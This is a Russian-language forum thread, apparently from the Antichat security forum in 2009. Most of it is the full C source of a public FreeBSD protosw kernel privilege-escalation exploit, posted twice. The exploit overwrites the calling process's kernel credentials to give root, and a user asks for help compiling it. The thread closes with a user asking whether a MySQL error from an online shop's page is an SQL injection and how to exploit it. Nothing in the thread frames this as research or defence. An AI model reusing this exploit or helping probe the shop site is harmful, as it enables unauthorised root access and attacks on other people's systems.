ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

11.04.2009, 18:58
|
|
Познающий
Регистрация: 05.04.2009
Сообщений: 71
Провел на форуме: 299541
Репутация:
5
|
|
такой вопрос
Я компилируею сплоит коммандой
gcc sploitname.c –o sploitname только не в netcat а теленето у меня получится это сделать?
error: syntax error before '{' token
gcc sploitname.c -o sploitname.c
ПИшет вот такое
|
|
|

11.04.2009, 19:01
|
|
Познающий
Регистрация: 28.10.2008
Сообщений: 43
Провел на форуме: 117557
Репутация:
125
|
|
Читай исходник сплоита, наверное он из паблика и в коде есть ошибка.
|
|
|

11.04.2009, 19:03
|
|
Постоянный
Регистрация: 20.12.2007
Сообщений: 334
Провел на форуме: 1934122
Репутация:
118
|
|
это не зависит, через какой клиент ты подключен к серверу и пытаешся, чтото компилировать.
Ошибка в сплойте.
|
|
|

11.04.2009, 19:10
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
кури язык "с", сам не можешь - код сплойта в студию, или ты еще сначала предварительно постов 20 сделаешь, пока догадаешься выложить код?
|
|
|

11.04.2009, 19:20
|
|
Познающий
Регистрация: 05.04.2009
Сообщений: 71
Провел на форуме: 299541
Репутация:
5
|
|
Сообщение от Pashkela
кури язык "с", сам не можешь - код сплойта в студию, или ты еще сначала предварительно постов 20 сделаешь, пока догадаешься выложить код?
/*
* This is a quick and very dirty exploit for the FreeBSD protosw vulnerability
* defined here:
* http://security.freebsd.org/advisories/FreeBSD-SA-08:13.protosw.asc
*
* This will overwrite your credential structure in the kernel. This will
* affect more than just the exploit's process, which is why this doesn't
* spawn a shell. When the exploit has finished, your login shell should
* have euid=0.
*
* Enjoy, and happy holidays!
* - Don "north" Bailey (don.bailey@gmail.com) 12/25/2008
*/
#include <sys/mman.h>
#include <sys/time.h>
#include <sys/stat.h>
#include <sys/proc.h>
#include <sys/types.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <netgraph/ng_socket.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <errno.h>
#define PAGES 1
#define PATTERN1 0x8f8f8f8f
#define PATTERN2 0x6e6e6e6e
typedef unsigned long ulong;
typedef unsigned char uchar;
int
x(void)
{
struct proc * p = (struct proc * )PATTERN1;
uint * i;
while(1)
{
if(p->p_pid == PATTERN2)
{
i = (uint * )p->p_ucred;
*++i = 0;
break;
}
p = p->p_list.le_next;
}
return 1;
}
int
main(int argc, char * argv[])
{
ulong addr;
uchar * c;
uchar * d;
uint * i;
void * v;
int pid;
int s;
if(argc != 2)
{
fprintf(stderr, "usage: ./x <allproc>\n");
return 1;
}
addr = strtoul(argv[1], 0, 0);
v = mmap(
NULL,
(PAGES*PAGE_SIZE),
PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_ANON|MAP_FIXED,
-1,
0);
if(v == MAP_FAILED)
{
perror("mmap");
return 0;
}
c = v;
d = (uchar * )x;
while(1)
{
*c = *d;
if(*d == 0xc3)
{
break;
}
d++;
c++;
}
*c++ = 0xc3;
c = v;
while(1)
{
if(*(long * )c == PATTERN1)
{
*(c + 0) = addr >> 0;
*(c + 1) = addr >> 8;
*(c + 2) = addr >> 16;
*(c + 3) = addr >> 24;
break;
}
c++;
}
pid = getpid();
while(1)
{
if(*(long * )c == PATTERN2)
{
*(c + 0) = pid >> 0;
*(c + 1) = pid >> 8;
*(c + 2) = pid >> 16;
*(c + 3) = pid >> 24;
break;
}
c++;
}
s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA);
if(s < 0)
{
perror("socket");
return 1;
}
shutdown(s, SHUT_RDWR);
return 0;
}
// milw0rm.com [2008-12-28]
|
|
|

11.04.2009, 21:33
|
|
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме: 914766
Репутация:
317
|
|
а заключить в код - не судьба не как..?
PHP код:
/*
* This is a quick and very dirty exploit for the FreeBSD protosw vulnerability
* defined here:
* http://security.freebsd.org/advisories/FreeBSD-SA-08:13.protosw.asc
*
* This will overwrite your credential structure in the kernel. This will
* affect more than just the exploit's process, which is why this doesn't
* spawn a shell. When the exploit has finished, your login shell should
* have euid=0.
*
* Enjoy, and happy holidays!
* - Don "north" Bailey (don.bailey@gmail.com) 12/25/2008
*/
#include <sys/mman.h>
#include <sys/time.h>
#include <sys/stat.h>
#include <sys/proc.h>
#include <sys/types.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <netgraph/ng_socket.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <errno.h>
#define PAGES 1
#define PATTERN1 0x8f8f8f8f
#define PATTERN2 0x6e6e6e6e
typedef unsigned long ulong;
typedef unsigned char uchar;
int
x(void)
{
struct proc * p = (struct proc * )PATTERN1;
uint * i;
while(1)
{
if(p->p_pid == PATTERN2)
{
i = (uint * )p->p_ucred;
*++i = 0;
break;
}
p = p->p_list.le_next;
}
return 1;
}
int
main(int argc, char * argv[])
{
ulong addr;
uchar * c;
uchar * d;
uint * i;
void * v;
int pid;
int s;
if(argc != 2)
{
fprintf(stderr, "usage: ./x <allproc>\n");
return 1;
}
addr = strtoul(argv[1], 0, 0);
v = mmap(
NULL,
(PAGES*PAGE_SIZE),
PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_ANON|MAP_FIXED,
-1,
0);
if(v == MAP_FAILED)
{
perror("mmap");
return 0;
}
c = v;
d = (uchar * )x;
while(1)
{
*c = *d;
if(*d == 0xc3)
{
break;
}
d++;
c++;
}
*c++ = 0xc3;
c = v;
while(1)
{
if(*(long * )c == PATTERN1)
{
*(c + 0) = addr >> 0;
*(c + 1) = addr >> 8;
*(c + 2) = addr >> 16;
*(c + 3) = addr >> 24;
break;
}
c++;
}
pid = getpid();
while(1)
{
if(*(long * )c == PATTERN2)
{
*(c + 0) = pid >> 0;
*(c + 1) = pid >> 8;
*(c + 2) = pid >> 16;
*(c + 3) = pid >> 24;
break;
}
c++;
}
s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA);
if(s < 0)
{
perror("socket");
return 1;
}
shutdown(s, SHUT_RDWR);
return 0;
}
// milw0rm.com [2008-12-28]
PS - так понимаеш!
Видемо нет......
Тоесть закрыть тегами PHP в квадратных скобках....
что бы людям было удобнее читать код...
Последний раз редактировалось farex; 11.04.2009 в 22:45..
Причина: Показал как
|
|
|

11.04.2009, 21:36
|
|
Познающий
Регистрация: 05.04.2009
Сообщений: 71
Провел на форуме: 299541
Репутация:
5
|
|
Сообщение от farex
а заключить в код - не судьба не как..?
не прокатывает
Последний раз редактировалось massovka; 12.04.2009 в 11:06..
|
|
|

11.04.2009, 22:48
|
|
Участник форума
Регистрация: 15.03.2009
Сообщений: 231
Провел на форуме: 859739
Репутация:
146
|
|
Вот это сойдёт как sql инекция?Если да, то что можно сделать?
Error text: sql: Can't execute SQL command [ SELECT DTitle, DShort, DId, CShort FROM pshop_Docs, pshop_DocsCategories WHERE DType=9 AND DShow=1 AND DRemoved=0 AND CId=9 ORDER BY DId DESC LIMIT -10,10 ] [ You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-10,10' at line 1 ] (SHtml, (eval 9), 76)
|
|
|

11.04.2009, 22:56
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
Ну да, если даные передаешь ТЫ!
|
|
|

11.04.2009, 22:59
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме: 950638
Репутация:
256
|
|
Сообщение от navigat0r
Вот это сойдёт как sql инекция?Если да, то что можно сделать?
Error text: sql: Can't execute SQL command [ SELECT DTitle, DShort, DId, CShort FROM pshop_Docs, pshop_DocsCategories WHERE DType=9 AND DShow=1 AND DRemoved=0 AND CId=9 ORDER BY DId DESC LIMIT -10,10 ] [ You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-10,10' at line 1 ] (SHtml, (eval 9), 76)
да, хотя дай линк, точно сказать нельзя...
|
|
|
|
 |
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|